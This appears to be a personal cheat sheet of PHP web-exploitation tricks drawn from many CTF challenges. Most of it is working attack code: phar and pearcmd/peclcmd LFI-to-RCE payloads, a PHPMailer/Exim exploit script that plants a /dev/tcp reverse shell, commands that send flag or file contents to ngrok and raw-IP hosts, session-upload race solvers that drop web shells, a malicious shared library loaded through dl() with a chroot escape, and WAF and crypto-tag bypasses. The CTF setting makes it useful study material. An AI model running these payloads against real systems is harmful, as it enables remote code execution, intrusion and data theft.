    
    # Script entry point: drive the async main() to completion on a new event loop.
    if __name__ == "__main__":
        asyncio.run(main())
    

    Phar payloads still work in PHP 8 when loaded via include(…); the phar can also be gzipped (e.g. payload.phar.gz) and will still work

    Event NameDEADSEC 2025
    GitHub URL-
    Challenge Namebaby-web
    Attachments
    References

    <?php
    // Create the archive and buffer all changes until stopBuffering().
    $phar = new Phar('exploit.phar');
    $phar->startBuffering();
    
    // Stub placed at the start of the archive; the nowdoc keeps it verbatim.
    $stub = <<<'STUB'
    <?php
        system('/readflag');
        __HALT_COMPILER();
    ?>
    STUB;
    
    $phar->setStub($stub);
    // Add a placeholder entry to the archive.
    $phar->addFromString('dummy.txt', 'dummy');
    // Flush the buffered changes to exploit.phar.
    $phar->stopBuffering();
    
    ?>

    Gzip the payload, upload it, and include it with /index.php?url=payload.phar.gz

    PHP Mailer CVE 2016 with EXIM4

    Event NameIERAE CTF 2025
    GitHub URL-
    Challenge NameCokePHP
    Attachments
    References

    GET /debug/<@urlencode_all><@urlencode_all>Debug/var/www/src/modules/debug.php:5$0</@urlencode_all></@urlencode_all>/phpinfo/CONFIG_CONFIG_module_namespace/<@urlencode_all>%00<@urlencode_all>App\Modules</@urlencode_all></@urlencode_all> HTTP/1.1

    PHP Mailer CVE 2016 with EXIM4

    Event NameMidnight Sun CTF 2025 Quals
    GitHub URL-
    Challenge NameUselessCorp
    Attachments
    References

    solve 1

    Here's the script I used for ACE on uselesscorp:

    import requests
    import base64
    
    REV_SHELL_IP = '10.20.30.40'
    REV_SHELL_PORT = 1337

    # Base URL without a trailing slash; request paths are appended with a
    # leading "/".  The previous values were wrapped in <...> (autolink residue
    # from a chat paste), which made every request URL invalid.
    HOST = 'http://localhost'
    # HOST = 'https://useless-94tszh4z.ctf.pro'
    sess = requests.Session()
    
    def send_mail(email: str):
        """Submit the contact form on ``/index.php`` with *email* as the sender."""
        form = dict(
            name='a',
            email=email,
            subject='cool',
            message='Important message',
            submit='submit',
        )

        print(f'Sending {email = }')
        sess.post(HOST + '/index.php', data=form)
    
    def run_cmd(cmd: str):
        """Wrap *cmd* (base64-encoded) in the expansion string and send it via ``send_mail``."""
        encoded = base64.b64encode(cmd.encode()).decode()
        exploit = '${run,preexpand{${base64d:%s}}}' % encoded
        send_mail('"a\\\\" -be %s "@a' % exploit)
    
    # Delete /tmp/a first in case it exists. Convenience, because we're appending later
    run_cmd("/bin/rm /tmp/a")
    
    # Then write our target command to `/tmp/a` one char at a time:
    TARGET_CMD = f"""
    /bin/bash -i >& /dev/tcp/{REV_SHELL_IP}/{REV_SHELL_PORT} 0>&1
    """.strip()
    
    # Each character is embedded between single quotes inside a double-quoted
    # shell string below, so neither quote character may occur in the command.
    assert "'" not in TARGET_CMD and '"' not in TARGET_CMD
    for c in TARGET_CMD:
        run_cmd(f'''/bin/sh -c "echo -n '{c}'>>/tmp/a"''')
    
    # Now we execute the file we've written
    run_cmd("/bin/bash /tmp/a")
    
    # And clean up at the end
    run_cmd("/bin/rm /tmp/a")
    
    solve 2
    curl -X POST https://useless-94tszh4z.ctf.pro -d 'name=a' -d 'subject=a' -d 'message=a' -d 'submit=submit' -d 'email="\" -be ${readsocket{inet:0.tcp.ap.ngrok.io:19066}{${readfile{/flag.txt}}}} "@x'
    solve 3

    TLDR writeup for Uselesscorp

  • Find endpoint /includes from the style css
  • See that it has file class.phpmailer.php
  • Find out that it is v5.2.17 from size and date of file.
  • See that it's vulnerable to CVE 2016-10033
  • Apache tells us that it's using Debian
  • Find out that Debian uses Exim4 (for sendmail)
  • Spend time debugging why it doesn't work
  • Replicate environment with exim4 and apache in docker.
  • Find this Github README and translate to english https://github-com.translate.goog/yaofeifly/Vub_ENV/blob/ac981ca3ca2be324f011ef2ddc32a0da094c4599/WordPress_CVE-2016-10033/README.md?_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp (Select auto-detect language)
  • See that it mentions EXIM4 strings using be
  • Find documentation https://www.exim.org/exim-html-current/doc/html/spec_html/ch-string_expansions.html
  • Try out ${readsocket{inet:ngrok.url.here:ngrok.port}{message_here}} with ngrok
    • It does work!
  • Then use ${readfile{/flag.txt}} to get flag content
  • Combine both for exploit
    • ${readsocket{inet:ngrok.url.here:ngrok.port}{${readfile{/flag.txt}}}}
  • Win!
  • Use peclcmd.php to get code execution, either without writing a file or by writing a file


    Without writing a file

    GET /?page=../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r"system(hex2bin('PAYLOAD'));"+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt HTTP/1.1
    
    GET /?page=../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r`sleep$\{IFS\}5`+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt HTTP/1.1
    ../../../../../../../../../../usr/local/lib/php/peclcmd
    +run-tests+-i+-r`sleep${IFS}5`+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt
    ../../../../../../../../../../usr/local/lib/php/peclcmd&x=+run-tests+-i+-r`sleep${IFS}5`+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt

    With writing a file

    curl "https://filestore.web.actf.co/?f=../../../../usr/local/lib/php/pearcmd.php&+-c+/tmp/foo.php+-d+man_dir=><?echo(system(\\$_GET\\['a'\\]));?>+-s+"
    
    curl "http://172.26.119.33:9100/wp-content/plugins/kiwiblocks/src/admin-panel/views/panel.php?tab=../../../../../../../../../../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r\"system(hex2bin('$(echo "curl 77.37.47.226:4444 -d \"`cat /*`\"" | hexdump -v -e '/1 "%02x"' | tr -d '\n')'));\"+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt"

    PHP Extract + Dompdf Options

    Event NameCyber Jawara National 2024
    GitHub URL-
    Challenge NameName Card
    Attachments

    data%5Bname%5D=a&data%5BphotoUrl%5D=https://letsenhance.io/static/73136da51c245e80edc6ccfe44888a99/1015f/MainBefore.jpg<?=system('ls');?>&data%5Bemail%5D=aa%40mail.com&data%5Bphone%5D=08111111111111&data%5Baddress%5D=aaaaaaaaaaaa&data[config][isRemoteEnabled]=1&data[config][logOutputFile]=/var/www/html/log.php&data[config][debugPng]=1&data[config][debugCss]=1

    Case insensitive function call

    Event NamePatchstack Alliance CTF S02E01 - WordCamp Asia
    GitHub URL-
    Challenge NameCool Templates
    Attachments
    References

    We can call PHP functions case-insensitively. For example, System() will be treated as system().

    php filter bypass

    Filter Madness - web

    Image
    Image

    Based on the provided images, here is the exact text contained within them:

    Image 1 (image_c7e677.png)

    Input

    Plaintext

    resource=data:,14
    zombies for the flag
    0
    |dechunk

    Output

    Plaintext

    resource=data:,14%0Azombies%20for%20the%20flag%0A0%0A%7Cdechunk

    Image 2 (image_c7e559.png)

    Browser URL Bar

    Plaintext

    https://filter-madness-tlejfksioa-ul.a.run.app/?madness=resource=data:,14%0Azombies%20for%20the%20flag%0A0%0A%7Cdechunk

    Page Content

    Plaintext

    Warning: file_get_contents(): Unable to locate filter "resource=data:,14 zombies for the flag 0 " in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to create filter (resource=data:,14 zombies for the flag 0 ) in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to locate filter "resource=" in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to create filter (resource=) in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to locate filter "etc" in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to create filter (etc) in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to locate filter "passwd" in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to create filter (passwd) in /var/www/html/index.php on line 11
    Can you submit some madness that will return the flag?
    
    Your filter madness: php://filter/resource=data:,14 zombies for the flag 0 |dechunk/resource=/etc/passwd
    Your filter madness length: 83
    Your filter madness results: wctf{m4y6e-th15-15-4-6u9-1n-php-83047}

    Bypass exit() in PHP: PHP file upload when we can manipulate the start of the file_put_contents filename (possibility to use a PHP filter chain)

    Event NamePatchstack Alliance CTF S02E01 - WordCamp Asia
    GitHub URL-
    Challenge NameBlocked
    Attachments
    References

    $write = <<<EOF
        <?php
            exit('ha?');
            // $content
    
    EOF;
    
    file_put_contents($name . '.php', $write);

    It’s possible to gain RCE in this kind of code if we can manipulate $name: we can use a PHP filter chain.

    imagepng is one of many functions whose output we can manipulate with a PHP filter chain if we control the start of the filename

    Event NamePatchstack Alliance CTF S02E01 - WordCamp Asia
    GitHub URL-
    Challenge NameSneaky
    Attachments
    References

    LessPHP 0day in version "wikimedia/less.php": "5.2.1", if we can control SetImportDirs

    Event NamePWNME CTF Quals 2025
    GitHub URLhttps://github.com/Phreaks-2600/PwnMeCTF-2025-quals/blob/main/Web/Pwnshop/solve/README.md
    Challenge NamePwnshop
    Attachments
    References

    if (file_exists($customLessPath)) {
        $customLess = file_get_contents($customLessPath);
        $parser = new \Less_Parser();
        $importDirs = $this->getImportDirectories();
        $parser->SetImportDirs($importDirs);
        $parser->parse($customLess);
        $customCSS = $parser->getCss();
        $css .= "\n/* Custom CSS */\n" . $customCSS;
    }
    

    PHP SESSION UPLOAD PROGRESS SESSION FILE WRITE

    https://book.hacktricks.xyz/pentesting-web/file-inclusion/via-php_session_upload_progress

    This does not work if the include appends an extension, for example require $path.".php" (the session file name does not end with .php)

    solver
    import httpx
    import asyncio
    
    URL = "http://localhost"
    CMD = "dir"
    # change to php session location, eg: /var/lib/php/sessions or /tmp or /xampp/tmp
    SESSION_LOCATION = "/xampp/tmp"
    SESSION_NAME = "sebastian"
    FILE_SIZE = 1_000_000
    REQUEST_NUM = 100
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.AsyncClient(base_url=url, timeout=999)
    
        def lfi(self, file, cmd):
            """Trigger the local file inclusion against `file`.

            Args:
                file: Absolute path of the file to include (the caller passes the
                    PHP session file path).
                cmd: Value sent as the `cmd` query parameter, which the uploaded
                    payload passes to `system()`.

            Returns:
                Whatever `self.c.post` returns for the request.
            """
            # The path-traversal prefix must be followed by the file to include;
            # the previous version ignored `file` and pointed at the session
            # directory instead of the session file.
            return self.c.post(f"/wp-admin/admin-ajax.php?action=nopriv_geo_mashup_query&object_ids=1&object_name=&template=../../../../../../../../../..{file}&cmd={cmd}")
    
    class API(BaseAPI):
        async def upload_shell(self):
            payload='success<?php system($_GET["cmd"])?>'
            res = await self.c.post("/", files={"f": ("foo", "A"*FILE_SIZE)}, data={
                'PHP_SESSION_UPLOAD_PROGRESS':  payload
            }, headers = {
                'Cookie': 'PHPSESSID='+SESSION_NAME
            })
            return res
    
    async def main():
        """Race upload requests against LFI requests until one response shows the payload ran.

        Each round fires REQUEST_NUM uploads and REQUEST_NUM inclusion requests
        concurrently, then prints the first response containing "success".
        """
        includer = API()
        uploader = API()
        session_file = SESSION_LOCATION + "/sess_" + SESSION_NAME
        while True:
            pending = [uploader.upload_shell() for _ in range(REQUEST_NUM)]
            pending += [includer.lfi(session_file, CMD) for _ in range(REQUEST_NUM)]
            responses = await asyncio.gather(*pending)
            # Stop at the first response that contains the marker from the payload.
            hit = next((resp for resp in responses if "success" in resp.text), None)
            if hit is not None:
                print(hit.text)
                return
    
    if __name__ == "__main__":
        asyncio.run(main())

    RCE via HTML Template Injection in require()

    If there is an HTML injection plus a require gadget, we can turn that template injection into RCE by brute-forcing the file descriptor that holds the rendered HTML injection

    PHP Reflection class

    Unsecure (TCP1P CTF 2023)

    <?php

    // Builds the serialized gadget chain Echoers -> Adders -> Vuln and prints it
    // base64-encoded.

    include 'GadgetOne/Adders.php';
    include 'GadgetTwo/Echoers.php';
    include 'GadgetThree/Vuln.php';

    // PHP namespace separators are a single backslash.
    use GadgetOne\Adders;
    use GadgetTwo\Echoers;
    use GadgetThree\Vuln;

    /* Gadget Three */
    $vuln = new Vuln();

    $vuln->waf1 = 1;

    // waf2 is set through reflection (presumably because it is not public;
    // verify against Vuln.php).
    $reflection2 = new \ReflectionProperty(get_class($vuln), 'waf2');
    $reflection2->setAccessible(true);
    $reflection2->setValue($vuln, "\xde\xad\xbe\xef");

    # $vuln->cmd = "system('ls -alh');";
    $vuln->cmd = "system('cat 182939124819238912571292389218129123.txt');echo '\n';";

    /* Gadget One */
    $adder=new Adders($vuln);

    /* Gadget Two */
    $echoers = new Echoers();

    // Same reflection approach to place the Adders object into Echoers::klass.
    $reflection3 = new \ReflectionProperty(get_class($echoers), 'klass');
    $reflection3->setAccessible(true);
    $reflection3->setValue($echoers, $adder);

    $serialized = serialize($echoers);

    echo base64_encode($serialized);
    echo "\n\n";
    

    Bypassing PHP openssl_decrypt aes-128-gcm authentication using the one-byte $tag technique (TSGCTF2023) (DANCE)

    <?php
    $auth = "guest";
    $cipher = "aes-128-gcm";
    $key = "asdkwosqdiwq";
    $ivlen = openssl_cipher_iv_length($cipher);
    $iv = "qwinviwjeqwoqw";
    $encrypted_auth = openssl_encrypt($auth, $cipher, $key, $options = 0, $iv, $tag);
    echo "guest enc";
    var_dump($encrypted_auth);
    
    $decoded = base64_encode((base64_decode($encrypted_auth) ^ "guest")^"admin") ;
    
    echo "Admin tamper enc ";
    var_dump($decoded);
    
    echo "tag before ";
    var_dump($tag);
    
    
    // Brute-force a one-byte authentication tag for the tampered ciphertext.
    // All 256 byte values (0x00-0xff) must be tried; stopping at 254 would miss
    // a tag whose first byte is 0xff.
    for ($i = 0; $i < 256; $i++) {
        $tag = chr($i);
        $decrypted = openssl_decrypt($decoded, $cipher, $key, 0, $iv, $tag);
        // openssl_decrypt() returns false on failure; compare strictly so that a
        // valid but falsy plaintext (e.g. "0") is not mistaken for a failure.
        if ($decrypted !== false) {
            echo "tag matched ";
            var_dump($tag);
            echo "decode our tampered admin cookie ";
            var_dump($decrypted);
        }
    }
    

    https://hackmd.io/@Ud2Y6umGS0e2DCVusYcQ3w/r15gGTNXa

    Dari writeup di atas kita bisa simpulkan bahwa kita bisa men-tamper $tag-nya dengan menebak byte pertamanya saja. Ini dikarenakan fungsi openssl_decrypt di PHP tidak melakukan pengecekan panjang (length) dari $tag, sehingga jika kita memberi 1 byte ke openssl_decrypt, fungsi tersebut hanya mencocokkan 1 byte pertama dari $tag asli.

    Int trim in PHP

    php > echo (int) "12asd";
    12
    

    Maybe unserialize

    jadi klo make func maybe_serialize itu pasti bakalan nge-serialize lagi input yang formatnya udah serialized. misal nginput object yang udah di-serialize, ntar bakalan di-serialize lagi jadi string

    nah, menariknya.. ini bisa dilewati dengan cara ga make ; atau } ntar tetep jadi object. Cuma menariknya lagiii, kalau make fungsi unserialize itu tetep bisa nge-unserialize serialized yang ga complete (missing ; atau })

    ex:

    <?php
    
    class Flag
    {
        private $msg;
    
        public function __wakeup(): void
        {
            require "flag.php";
            $this->msg = $flag;
            $this->printFlag();
        }
    
        public function printFlag()
        {
            print($this->msg);
        }
    }
    
    function maybe_serialize($data)
    {
        if (is_array($data) || is_object($data)) {
            return serialize($data);
        }
    
        if (is_serialized($data, false)) {
            return serialize($data);
        }
    
        return $data;
    }
    
    
    function is_serialized($data, $strict = true)
    {
        // If it isn't a string, it isn't serialized.
        if (!is_string($data)) {
            return false;
        }
        $data = trim($data);
        if ('N;' === $data) {
            return true;
        }
        if (strlen($data) < 4) {
            return false;
        }
        if (':' !== $data[1]) {
            return false;
        }
        if ($strict) {
            $lastc = substr($data, -1);
            if (';' !== $lastc && '}' !== $lastc) {
                return false;
            }
        } else {
            $semicolon = strpos($data, ';');
            $brace     = strpos($data, '}');
            var_dump($data);
            var_dump($semicolon.$brace);
            // Either ; or } must exist.
            if (false === $semicolon && false === $brace) {
                return false;
            }
            // But neither must be in the first X characters.
            if (false !== $semicolon && $semicolon < 3) {
                return false;
            }
            if (false !== $brace && $brace < 4) {
                return false;
            }
        }
        $token = $data[0];
        switch ($token) {
            case 's':
                if ($strict) {
                    if ('"' !== substr($data, -2, 1)) {
                        return false;
                    }
                } elseif (!str_contains($data, '"')) {
                    return false;
                }
                // Or else fall through.
            case 'a':
            case 'O':
            case 'E':
                return (bool) preg_match("/^{$token}:[0-9]+:/s", $data);
            case 'b':
            case 'i':
            case 'd':
                $end = $strict ? '$' : '';
                return (bool) preg_match("/^{$token}:[0-9.E+-]+;$end/", $data);
        }
        return false;
    }
    
    
    
    // Driver: feed a truncated serialized object (no ';' or '}') through
    // maybe_serialize() and then unserialize() the result.
    // $user_input = serialize(new Flag());
    // Inner double quotes are escaped with a single backslash.
    $user_input = "O:4:\"Flag\":0:{";
    // In non-strict mode is_serialized() requires a ';' or '}' to be present, so
    // this input is returned unchanged instead of being serialized a second time.
    $serialized_result = maybe_serialize($user_input);
    var_dump(json_encode($user_input));
    var_dump($user_input);
    var_dump($serialized_result);

    var_dump(unserialize($serialized_result));
    // var_dump(unserialize($user_input));
    
    

    Change root directory

    In PHP we can change the root directory using chroot(). Once the root is changed, it becomes possible to change PHP's configuration and potentially bypass open_basedir. However, chroot() has many restrictions: you need root privileges and you need to run your script with the PHP CLI. You can find more information about chroot here: https://www.php.net/manual/en/function.chroot.php

    ASIS CTF 2023 final challenge phphphphp

    dl, load a malicious PHP library

    ASIS CTF 2023 final challenge phphphphp

    You can use dl() to load a malicious library, but you need to use the PHP CLI or another SAPI with enable_dl=true

    example payload:

    from asis ctf challenge phphphphphp

    from pwn import *
    import time, base64, os
    
    with open("foo.c", "wb") as f:
        f.write(b"""
        #include <stdlib.h>
        #include <sys/stat.h>
        #include <unistd.h>
        #include <stdio.h>
    
        static void foo() __attribute__((constructor));
        void foo(void)
        {
            puts("pwned\\\\n");
    
            mkdir("chroot-dir", 0755);
            chroot("chroot-dir");
            // escape from chroot
            for(int i = 0; i < 1000; i++) {
                chdir("..");
            }
            chroot(".");
            system("cat /flag.txt");
        }
        """)
    os.system("gcc -o libfoo.so -shared foo.c")
    
    libfoo = open("libfoo.so", "rb").read()
    payload = b"""
    <?php
    $libfoo = "###DATA###";
    $libfoo = base64_decode($libfoo);
    chroot("/tmp");
    mkdir("/var/www/sbx/usr/local/lib/php/extensions/no-debug-non-zts-20230831", 0777, true);
    file_put_contents("/var/www/sbx/usr/local/lib/php/extensions/no-debug-non-zts-20230831/foo.so", $libfoo);
    chmod("/var/www/sbx/usr/local/lib/php/extensions/no-debug-non-zts-20230831/foo.so", 0777);
    chroot("/var/www/sbx");
    dl("foo");
    ?>
    """.strip()
    
    payload = payload.replace(b"###DATA###", base64.b64encode(libfoo))
    
    while True:
        with remote("3.75.187.223", 7321, level="debug") as io:
            line = io.recv()
            if b"one try every" in line:
                print("timeout from ip, waiting")
                time.sleep(5)
                continue
            print(line)
    
            print("sending payload")
            io.sendline(str(len(payload)).encode())
            io.send(payload)
            io.interactive()
            break
    

    full phphphphphp solve script

    PHP Obfuscation (Stress Release Service TETCTF 2024)

    # Strings to obfuscate: the PHP function name and its argument.
    string_code = ['system', 'cat s*']

    # Characters that may appear inside the generated PHP expression. Each entry
    # must be exactly one character because its ord() value is XOR-ed.
    charset = ["\\", "'", ".", "?", '(', ')', '^']


    def escape_char(s):
        """Return `s` escaped for use inside a single-quoted PHP string."""
        to_escape = {
            "'": "\\'",
            "\\": "\\\\",
        }
        return to_escape.get(s, s)


    def search(s):
        """Find charset characters whose XOR equals the character `s`.

        Candidate 7-tuples are visited in lexicographic charset order, and for
        each tuple the prefixes of length 2 to 7 are tried shortest first.

        Returns:
            A PHP fragment such as ".('a'^'b')" on success, or False when no
            combination of up to seven charset characters produces `s`.
        """
        import itertools

        target = ord(s)
        for combo in itertools.product(charset, repeat=7):
            acc = ord(combo[0])
            for size in range(2, 8):
                acc ^= ord(combo[size - 1])
                if acc == target:
                    quoted = "^".join("'%s'" % escape_char(c) for c in combo[:size])
                    return ".(%s)" % quoted
        return False


    if __name__ == "__main__":
        obfuscated_code = ""
        for code in string_code:
            # Characters that cannot be expressed as an XOR are emitted literally.
            pieces = [search(ch) or ".'%s'" % ch for ch in code]
            # Drop the leading "." of the first piece before wrapping in parentheses.
            obfuscated_code += "(%s)" % "".join(pieces)[1:]

        print(''.join(['("%s")' % i for i in string_code]) + '=' + obfuscated_code)
    

    PHP xor bin without ' and "

    <?php
    
    function get_xor($str){
        for ($i = 10; $i < 99; $i++) {
            for ($j = 10; $j < 99; $j++) {
                if ((hex2bin(strval($j)) ^ hex2bin(strval($i))) === $str) {
                    return [$j, $i];
                }
            }
        }
        return false;
    }
    
    function get_xor_str($str){
        $result = [];
    
        foreach (str_split($str) as $char) {
            $result[] = get_xor($char);
        }
    
        return $result;
    }
    
    function get_xor_joined($str){
        $result = "join(hex2bin(00),[";
        $arrxor = get_xor_str($str);
    
        foreach ($arrxor as $ab){
            $a = $ab[0];
            $b = $ab[1];
            $result .= "hex2bin($a)^hex2bin($b),";
        }
    
        $result = rtrim($result, ',') . "])";
    
        return $result;
    }
    
    // Print the quote-free expression for the command, followed by a newline.
    $inputString = "ls /";
    echo get_xor_joined($inputString)."\n";
    
    

    preg_match

    There is a special case where we can make preg_match("/([^a-z])+/s", $input) return false.

    In this case we need to add "A"*9000 to the input to make it return false

    https://hackmd.io/@abdinata/Website-Challenge-0xL4ughCTF-2024#Simple-WAF

    https://www.php.net/manual/en/function.include.php

    It is also able to include or open a file from a zip file:
    <?php
    include "something.zip#script.php";
    echo file_get_contents("something.zip#script.php");
    ?>
    Note that instead of using / or \, opening a file inside a zip archive uses # to separate the archive name from the inner file's name.
    

    Error based full path leak using long filename

    WolvCTF 2024

    import re
    import httpx
    
    # Target base URL. It must be a bare URL: the markdown-style <...> wrapper
    # would end up inside the string and break the httpx base_url.
    URL = "https://upload-fun-okntin33tq-ul.a.run.app/"
    # URL = "http://0:5500/"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url)
        def f(self, f):
            return self.c.get("/", params={"f":f})
        def upload(self, f):
            """POST `f` as the multipart file field "f" to the application root.

            Args:
                f: File value passed through to `files`, e.g. a
                    (filename, content) tuple.

            Returns:
                The response returned by `self.c.post`.
            """
            # A dict literal keeps only one value per key, so the duplicated "f"
            # entry was redundant; a single entry sends exactly the same request.
            return self.c.post("/", files={"f": f})
    
    class API(BaseAPI):
        ...
    
    if __name__ == "__main__":
        api = API()
        # Upload with a very long file name; the response is expected to leak the
        # upload path prefix (presumably via an error message; confirm on target).
        res = api.upload(("a"*1000000, "x"))
        # The dot is escaped with a single backslash so that the lookbehind
        # matches the literal text "./uploads/".
        match = re.search(r"(?<=\./uploads/).*?(?=_)", res.text)
        if match is None:
            raise SystemExit("upload path prefix not found in response")
        uppath = match.group(0)
        # Upload the PHP payload under a short name, then request it using the
        # leaked prefix.
        res = api.upload(("x", "<?=system('cat /flag*')?>"))
        res = api.f(uppath+"_x")
        print(res.text)
    
    

    Bypass require_once / include_once

    ACSC quals 2024 challenge DB Explorer

    solver

    import httpx
    
    # URL = "http://localhost:9000"
    URL = "http://db-exp.vuln.live/"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url)
    
    class API(BaseAPI):
        ...
    
    if __name__ == "__main__":
        while True:
            api = API()
            res = api.c.post("/index.php?normal=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/level_checker&admin=/var/lib/mysql/ibtmp1", data={"normal":"x"},headers={"Host": "admin.pepe"})
            if "dimasmaulana" in res.text:
                print(res.text.replace("\x00", "").encode().replace(b"\xef\xbf\xbd", b""))
    
    """
    copas terus menerus di phpmyadmin
    
    CREATE TEMPORARY TABLE temp (
        x BLOB
    );
    INSERT INTO temp (x) VALUES
    (CONCAT("dimasmaulana","<?=system('/flag');?>"));
    """

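    Chaining a symlink many times (for example by repeating /proc/self/root) lets us include the same file more than once even with include_once / require_once. This happens because PHP can no longer resolve the path to the already-included file once it goes through too many symlinks, so it treats it as a new file.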

    LFI to rce if nginx exist and we can’t use protocol

    0xbb - PHP LFI with Nginx Assistance (bierbaumer.net)

    PHP Filter after check

    ref: tamuctf 2024 challenge Remote

    FILTER_SANITIZE_URL removes every character that is not allowed in a URL. Because the sanitizing happens after the preg_match check, we can bypass the check by splitting a blocked word with such a character

    if(!preg_match("/(htm)|(php)|(js)|(css)/", $_REQUEST['url'])) {
      $url = filter_var($_REQUEST['url'], FILTER_SANITIZE_URL);

    ex using newline:

    import asyncio
    import httpx
    from pyngrok import ngrok
    from flask import Flask
    from threading import Thread
    from bs4 import BeautifulSoup
    
    PORT = 6666
    TUNNEL = ngrok.connect(PORT, "http").public_url
    
    print("TUNNEL:", TUNNEL)
    
    URL = "https://remote.tamuctf.com/"
    # URL = "http://localhost:8080/"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url, timeout=9999)
        def upload(self, url):
            return self.c.post("/index.php", data={"url": url})
        def uplaod_file(self, files, data):
            return self.c.post("/index.php", files=files, data=data)
        def home(self):
            return self.c.get("/")
    
    class API(BaseAPI):
        ...
    
    def webServer(pathname):
        app = Flask(__name__)
        @app.get(f"/{pathname}")
        def home():
            return "<?php system($_GET['dimas']);?>"
        return Thread(target=app.run, args=('0.0.0.0', PORT))
    
    
    
    async def main():
        api = API()
        pathname = "index.php"
        server = webServer(pathname)
        server.start()
        await asyncio.sleep(1)
        # api.c.cookies.set("PHPSESSID", "")
        res = api.upload(f"{TUNNEL}/index.ph\np")
        phpsessid = api.c.cookies['PHPSESSID']
        root = BeautifulSoup(res.text, features="html.parser")
        print(f"{URL}/uploads/{phpsessid}/{root.find_all('a').pop().get_attribute_list('href')[0].split('=')[1]}")
        server.join()
    
    if __name__ == "__main__":
        asyncio.run(main())
    

    the code:

    <?php
      } else if(isset($_REQUEST['url'])) {
        if(!preg_match("/(htm)|(php)|(js)|(css)/", $_REQUEST['url'])) {
          $url = filter_var($_REQUEST['url'], FILTER_SANITIZE_URL);
          if(filter_var($url, FILTER_VALIDATE_URL)) {
            $img = file_get_contents($url);
            if($img !== false) {
              $mime = substr($url, strrpos($url, '.') + 1);
              $file = random_filename(32, 'uploads/' . $sess, $mime);
    
              $f = fopen('uploads/' . $sess . '/' . $file, "wb");
              if($f !== false) {
                fwrite($f, $img);
                fclose($f);
                

    New 2 PHP Trick from b01lers CTF 2024 challenge

    web/library_of_<?php

    import httpx
    import re
    URL = "http://192.168.183.138:4444"
    # URL = "https://libraryofphp-c20d084bfc71e709.instancer.b01lersc.tf/"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url)
        def index(self, q):
            return self.c.post("/index.php", data={
                "q": q,
            })
        def search(self, s, securify, d):
            return self.c.get("/search.php", params={
                "s": s,
                "securify": securify,
                "d": d,
            })
    class API(BaseAPI):
        ...
    
    if __name__ == "__main__":
        api = API()
        # The PHPSESSID is given a null byte (%00) so that PHP ignores the text
        # after it: the session ID is not read past the null byte, which makes the
        # session invalid.
        api.c.cookies.set("PHPSESSID", "mysecretsession%00a<?=/*")
        # Set username to "" so that the program uses the last 6 bytes of PHPSESSID.
        api.c.cookies.set("username", "")
        # Our payload.
        res = api.index(
            q="*/`ls`; //aaax",
        )
        print(res.text)
        # Named note_id (not id) to avoid shadowing the builtin.
        note_id = re.search('(?<=">).*?(?=</a><br>)', res.text).group(0)

        res = api.c.get("/search.php?s="+note_id)
        print(res.text)
        res = api.search(
            s=note_id,
            # SHA-256 hash of the string "INF"
            securify="121b078c0b324860d916f4c10d6dc96ebc4885035ea6fbd75f78de5a3d9f8c41",
            # By passing 1e1000 we turn the result of `$d + rand(0, getrandmax())`
            # into the string INF in PHP.
            # So:
            # $d + rand(0, getrandmax()) === INF
            # hash('sha256', $d + rand(0, getrandmax())) === "121b078c0b324860d916f4c10d6dc96ebc4885035ea6fbd75f78de5a3d9f8c41"
            # Bypassing this check gives us access to 'include'.
            d="1e1000"
        )
        print(res.text)
    

    Bypass sha using INF obj

    In PHP, 1e1000 + rand(0, getrandmax()) overflows to the float INF. When this value is passed to hash(), it is converted to the string "INF", so the result is the SHA-256 hash of the string "INF".

    PHP will not read id of PHPSESSID after %00

    In this case, the PHP session algorithm will ignore the string after %00: api.c.cookies.set("PHPSESSID", "mysecretsession%00a<?=/*").

    If short_open_tag enabled

    b01lers CTF 2024 challenge library_of_<?php

    if short_open_tag enabled in php.ini we can do something like this

    <?1 system($_GET['x']);

    Bypass escapeshellcmd

    midnight-sun-2024/awkw4ard

    If there’s something like this, we can inject a space into the value: escapeshellcmd does not escape spaces, so the injected text becomes additional arguments to the command

    $iface = escapeshellcmd($_POST['interface']);
    exec("iw dev | awk -v iface=".$iface." '/^phy#/ { phy = $0 } $1 == \"Interface\" { interface = $2 } interface == iface { print phy }'", $return);
    
     <?php
    
        /*
        FROM php:8.3-fpm-alpine3.19
        RUN adduser -D -H -s /sbin/nologin pleb
        [...]
        USER pleb
        CMD ["php-fpm"]
        */
    
            ini_set("display_errors", TRUE);
            error_reporting(E_ALL);
    
    
        ?>
    
          <div class="bg-inside">
          </div>
        </div>
    
        <?php
    
          if(!isset($_POST['interface'])){
            highlight_file($_SERVER['SCRIPT_FILENAME']);
            exit();
          }
    
            $iface = escapeshellcmd($_POST['interface']);
            exec("iw dev | awk -v iface=".$iface." '/^phy#/ { phy = $0 } $1 == \"Interface\" { interface = $2 } interface == iface { print phy }'", $return);
            $phy = $return[0];
            exec('iw '.$phy.' info', $info);
        echo "<pre>" . $info[0] . "</pre>\n";
    
